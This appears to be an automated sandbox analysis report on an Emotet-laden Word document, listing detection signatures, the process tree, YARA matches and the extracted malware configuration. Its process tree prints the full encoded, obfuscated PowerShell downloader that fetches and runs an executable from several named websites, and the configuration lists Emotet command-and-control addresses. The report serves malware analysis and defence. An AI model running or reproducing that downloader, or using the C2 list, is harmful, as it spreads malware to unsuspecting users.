Loading ...

Play interactive tourEdit tour

Analysis Report Attachments E84598.doc

Overview

General Information

Sample Name:Attachments E84598.doc
Analysis ID:289573
MD5:651687995f977b407cf9cfdb443aea7b
SHA1:e0faddff0c3a3fc0c9225ce65a9b0687b3ee5c0d
SHA256:6867de72c598043560364930faf41ccc8954340495d6e0e465d9876b43d66784

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
PowerShell case anomaly found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains capabilities to detect virtual machines
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops certificate files (DER)
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2156 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • powershell.exe (PID: 2288 cmdline: POWeRsHeLL -ENCOD JABCADQAegBtAGEAMQBiAD0AKAAoACcAVAAnACsAJwB5AHUAJwApACsAJwBhAHYAJwArACcAYwBoACcAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAEUAbgBWADoAdQBTAEUAcgBQAFIATwBGAEkAbABFAFwASAB5AHUAOQBoAFYAMwBcAE0AZgBOAFgATwAzAHcAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABJAHIARQBDAFQATwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBgAGMAVQByAGkAdAB5AHAAYABSAG8AYABUAE8AQwBPAGwAIgAgAD0AIAAoACgAJwB0ACcAKwAnAGwAcwAnACkAKwAoACcAMQAyACcAKwAnACwAIAB0ACcAKQArACcAbAAnACsAKAAnAHMAJwArACcAMQAxACwAIAAnACkAKwAoACcAdABsACcAKwAnAHMAJwApACkAOwAkAFIAYwBkAHgAaQBjADgAIAA9ACAAKAAnAFgAJwArACgAJwA5AG8AJwArACcAdQAnACsAJwBxAGYAdAAnACkAKQA7ACQAQwB5AG8AdQBjAHAAZgA9ACgAJwBMAGYAJwArACgAJwB2AHAAJwArACcAbgB1AHQAJwApACkAOwAkAEUANwAyADcAMQBxAGMAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAnACsAJwAwAH0ASAB5AHUAOQBoAHYAMwAnACsAJwB7ADAAfQBNAGYAJwArACcAbgAnACsAJwB4ACcAKwAnAG8AMwB3AHsAMAB9ACcAKQAgAC0AZgBbAGMASABhAFIAXQA5ADIAKQArACQAUgBjAGQAeABpAGMAOAArACgAJwAuACcAKwAoACcAZQB4ACcAKwAnAGUAJwApACkAOwAkAFEAZgBoAHQAYQAzAHQAPQAoACgAJwBaACcAKwAnADAAMgBxACcAKQArACcAbwBjACcAKwAnAHIAJwApADsAJABYAGcAdAA2AGkAMwB3AD0AJgAoACcAbgAnACsAJwBlAHcALQBvACcAKwAnAGIAagBlAGMAdAAnACkAIABuAGUAdAAuAHcAZQBCAEMAbABpAGUAbgB0ADsAJABWADUAaABqAGMAeQAxAD0AKAAnAGgAdAAnACsAJwB0ACcAKwAoACcAcAA6AC8AJwArACcALwAnACkAKwAnAGsAJwArACgAJwBoAG8AJwArACcAYgBvACcAKwAnAHIAbQAnACsAJwBhAGwAZABhACcAKQArACgAJwAuACcAKwAnAGMAbwAnACkAKwAnAG0AJwArACcALwAnACsAKAAnAHcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACsAJwBuACcAKQArACcAdAAvACcAKwAnADgAJwArACcAMgAvACcAKwAnACoAaAAnACsAKAAnAHQAdABwACcAKwAnADoAJwArACcALwAvAGIAJwApACsAKAAnAGwAJwArACcAbwBnACcAKQArACcALgB6ACcAKwAoACcAdQBuAGEAcAAnACsAJwByACcAKQArACgAJwBvAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AdwBwAC0AJwApACsAKAAnAGEAJwArACcAZABtACcAKQArACcAaQAnACsAJwBuAC8AJwArACgAJwBMACcAKwAnAEUARQAvACcAKQArACgAJwAqAGgAdAB0ACcAKwAnAHAAOgAvAC8AJwArACcAbQAnACsAJwBlAGcAYQBzACcAKQArACgAJwBvAGwAdQAnACsAJwBjAG8AJwApACsAJwBlACcAKwAnAHMAJwArACgAJwB0AGkAJwArACcALgAnACsAJwBjAG8AbQAnACkAKwAnAC8AJwArACcAUgA5ACcAKwAoACcASwBEAHEAMABPACcAKwAnADgAJwApACsAJwB3ACcAKwAnAC8AJwArACgAJwBZAC8AJwArACcAKgAnACkAKwAnAGgAdAAnACsAKAAnAHQAcABzACcAKwAnADoALwAvAG8AJwApACsAJwBuACcAKwAoACcAbABpACcAKwAnAG4AZQAyADQAaAAuACcAKQArACcAYgBpACcAKwAoACcAegAnACsAJwAvAHcAJwArACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKQArACcASwAvACcAKwAoACcAKgBoAHQAdAAnACsAJwBwAHMAJwApACsAKAAnADoALwAnACsAJwAvACcAKQArACcAZgAnACsAJwBlAHAAJwArACgAJwBhAG0AJwArACcAaQAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvAHcAJwApACsAJwBwAC0AJwArACgAJwBpAG4AYwAnACsAJwBsAHUAZABlACcAKwAnAHMAJwApACsAKAAnAC8AZQBhACcAKwAnAEkALwAqACcAKQArACcAaAAnACsAJwB0ACcAKwAnAHQAJwArACgAJwBwADoALwAnACsAJwAvAG8AJwApACsAJwByACcAKwAnAGEAJwArACcALQAnACsAKAAnAGsAcwAnACsAJwAuAGMAJwApACsAJwBvACcAKwAoACcAbQAvACcAKwAnAHMAJwApACsAJwB5AHMAJwArACcAdABlACcAKwAoACcAbQAvACcAKwAnAGMAYQBjACcAKQArACgAJwBoACcAKwAnAGUALwAnACkAKwAoACcAdwAvACcAKwAnACoAaAAnACkAKwAoACcAdAB0ACcAKwAnAHAAOgAvACcAKwAnAC8AcAAnACkAKwAnAGEAJwArACcAZABhACcAKwAoACcAbQAnACsAJwBhAGcAJwApACsAKAAnAHIAbwAuACcAKwAnAGMAJwArACcAbwBtAC8AdwAnACkAKwAoACcAcAAtACcAKwAnAGEAZAAnACkAKwAoACcAbQBpAG4AJwArACcALwAnACkAKwAnAE4AYwAnACsAJwAvACcAKQAuACIAcwBwAEwAYABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABIAGQAagBuAGwAcgBsAD0AKAAoACcATgB5AHUAcABzACcAKwAnADMAJwApACsAJwBiACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAE0ANABzAHkAaABfAGQAIABpAG4AIAAkAFYANQBoAGoAYwB5ADEAKQB7AHQAcgB5AHsAJABYAGcAdAA2AGkAMwB3AC4AIgBEAG8AdwBuAEwAYABvAEEAZABgAEYASQBgAGwARQAiACgAJABNADQAcwB5AGgAXwBkACwAIAAkAEUANwAyADcAMQBxAGMAKQA7ACQASwA1ADkAawAwAF8AdgA9ACgAKAAnAEQAXwB3ACcAKwAnAGUAeQAnACkAKwAnAHoAdAAnACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQARQA3ADIANwAxAHEAYwApAC4AIgBMAGAARQBuAEcAVABIACIAIAAtAGcAZQAgADIANwA3ADUANgApACAAewAmACgAJwBJAG4AdgBvACcAKwAnAGsAZQAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACgAJABFADcAMgA3ADEAcQBjACkAOwAkAFEAZgBrAGsAZwBqAGcAPQAoACcAVwAnACsAKAAnAF8AbQAnACsAJwBpACcAKQArACgAJwBkACcAKwAnADgAaAAnACkAKQA7AGIAcgBlAGEAawA7ACQASwBiAHUAZgBoADAAawA9ACgAJwBYAGgAJwArACgAJwBtADYAJwArACcAZwB4ADYAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEUAMgA2AHcAMwBiAGgAPQAoACgAJwBUACcAKwAnAHEAYwBfAGkAJwApACsAJwBlAGIAJwApAA== MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • X9ouqft.exe (PID: 1900 cmdline: 'C:\Users\user\Hyu9hv3\Mfnxo3w\X9ouqft.exe' MD5: 51E79512C40B30536FF7E6F3DBC188D2)
      • werui.exe (PID: 884 cmdline: C:\Windows\SysWOW64\mfcm100\werui.exe MD5: 51E79512C40B30536FF7E6F3DBC188D2)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["12.163.208.58:80", "45.33.35.74:8080", "87.106.253.248:8080", "192.241.146.84:8080", "190.115.18.139:8080", "65.36.62.20:80", "170.81.48.2:80", "83.169.21.32:7080", "185.232.182.218:80", "190.2.31.172:80", "77.106.157.34:8080", "82.230.1.24:80", "202.4.58.197:80", "201.213.177.139:80", "78.249.119.122:80", "123.51.47.18:80", "77.90.136.129:8080", "60.93.23.51:80", "152.169.22.67:80", "190.117.79.209:80", "60.108.144.104:443", "213.197.182.158:8080", "82.76.111.249:443", "209.236.123.42:8080", "190.24.243.186:80", "177.74.228.34:80", "191.182.6.118:80", "96.245.123.149:80", "61.197.92.216:80", "1.226.84.243:8080", "111.67.12.221:8080", "216.47.196.104:80", "185.94.252.27:443", "70.116.143.84:80", "187.162.248.237:80", "217.13.106.14:8080", "80.11.164.185:80", "35.143.99.174:80", "190.190.148.27:8080", "219.92.13.25:80", "70.32.115.157:8080", "96.227.52.8:443", "51.75.33.127:80", "95.9.180.128:80", "174.113.69.136:80", "119.106.216.84:80", "111.67.77.202:8080", "91.105.94.200:80", "178.250.54.208:8080", "98.13.75.196:80", "116.202.23.3:8080", "202.134.4.210:7080", "50.28.51.143:8080", "45.33.77.42:8080", "67.247.242.247:80", "137.74.106.111:7080", "85.214.26.7:8080", "181.30.61.163:443", "77.238.212.227:80", "185.215.227.107:443", "186.103.141.250:443", "50.121.220.50:80", "74.136.144.133:80", "104.131.41.185:8080", "61.92.159.208:8080", "104.131.103.37:8080", "51.15.7.189:80", "185.94.252.12:80", "94.176.234.118:443", "212.71.237.140:8080", "5.196.35.138:7080", "45.46.37.97:80", "70.32.84.74:8080", "199.203.62.165:80", "38.88.126.202:8080", "51.159.23.217:443", "155.186.0.121:80", "51.38.124.206:80", "181.129.96.162:8080", "64.201.88.132:80", "92.24.50.153:80", "189.2.177.210:443", "45.16.226.117:443", "76.168.54.203:80", "185.178.10.77:80", "220.109.145.69:80", "192.81.38.31:80", "68.183.170.114:8080", "177.73.0.98:443", "138.97.60.141:7080", "192.241.143.52:8080", "217.199.160.224:7080", "185.183.16.47:80", "177.129.17.170:443", "5.189.178.202:8080", "74.58.215.226:80", "51.255.165.160:8080", "12.162.84.2:8080", "149.202.72.142:7080", "87.106.46.107:8080", "188.135.15.49:80", "68.183.190.199:8080", "172.104.169.32:8080", "68.69.155.181:80", "72.47.248.48:7080", "12.163.208.58:80", "45.33.35.74:8080", "87.106.253.248:8080", "192.241.146.84:8080", "190.115.18.139:8080", "65.36.62.20:80", "170.81.48.2:80", "83.169.21.32:7080", "185.232.182.218:80", "190.2.31.172:80", "77.106.157.34:8080", "82.230.1.24:80", "202.4.58.197:80", "201.213.177.139:80", "78.249.119.122:80", "123.51.47.18:80", "77.90.136.129:8080", "60.93.23.51:80", "152.169.22.67:80", "190.117.79.209:80", "60.108.144.104:443", "213.197.182.158:8080", "82.76.111.249:443", "209.236.123.42:8080", "190.24.243.186:80", "177.74.228.34:80", "191.182.6.118:80", "96.245.123.149:80", "61.197.92.216:80", "1.226.84.243:8080", "111.67.12.221:8080", "216.47.196.104:80", "185.94.252.27:443", "70.116.143.84:80", "187.162.248.237:80", "217.13.106.14:8080", "80.11.164.185:80", "35.143.99.174:80", "190.190.148.27:8080", "219.92.13.25:80", "70.32.115.157:8080", "96.227.52.8:443", "51.75.33.127:80", "95.9.180.128:80", "174.113.69.136:80", "119.106.216.84:80", "111.67.77.202:8080", "91.105.94.200:80", "178.250.54.208:8080", "98.13.75.196:80", "116.202.23.3:8080", "202.134.4.210:7080", "50.28.51.143:8080", "45.33.77.42:8080", "67.247.242.247:80", "137.74.106.111:7080", "85.214.26.7:8080", "181.30.61.163:443", "77.238.212.227:80", "185.215.227.107:443", "186.103.141.250:443", "50.121.220.50:80", "74.136.144.133:80", "104.131.41.185:8080", "61.92.159.208:8080", "104.131.103.37:8080", "51.15.7.189:80", "185.94.252.12:80", "94.176.234.118:443", "212.71.237.140:8080", "5.196.35.138:7080", "45.46.37.97:80", "70.32.84.74:8080", "199.203.62.165:80", "38.88.126.202:8080", "51.159.23.217:443", "155.186.0.121:80", "51.38.124.206:80", "181.129.96.162:8080", "64.201.88.132:80", "92.24.50.153:80", "189.2.177.210:443", "45.16.226.117:443", "76.168.54.203:80", "185.178.10.77:80", "220.109.145.69:80", "192.81.38.31:80", "68.183.170.114:8080", "177.73.0.98:443", "138.97.60.141:7080", "192.241.143.52:8080", "217.199.160.224:7080", "185.183.16.47:80", "177.129.17.170:443", "5.189.178.202:8080", "74.58.215.226:80", "51.255.165.160:8080", "12.162.84.2:8080", "149.202.72.142:7080", "87.106.46.107:8080", "188.135.15.49:80", "68.183.190.199:8080", "172.104.169.32:8080", "68.69.155.181:80", "72.47.248.48:7080"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2322800970.0000000000251000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000005.00000002.2354294088.0000000000234000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000005.00000002.2354771239.0000000000A50000.00000002.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
      • 0x5f934:$s1: POWeRsHeLL
      00000004.00000002.2322775234.0000000000220000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000004.00000002.2322790502.0000000000234000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          Click to see the 2 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          5.2.werui.exe.250000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
            4.2.X9ouqft.exe.250000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security

              Sigma Overview

              No Sigma rule has matched

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Antivirus / Scanner detection for submitted sampleShow sources
              Source: Attachments E84598.docAvira: detected
              Antivirus detection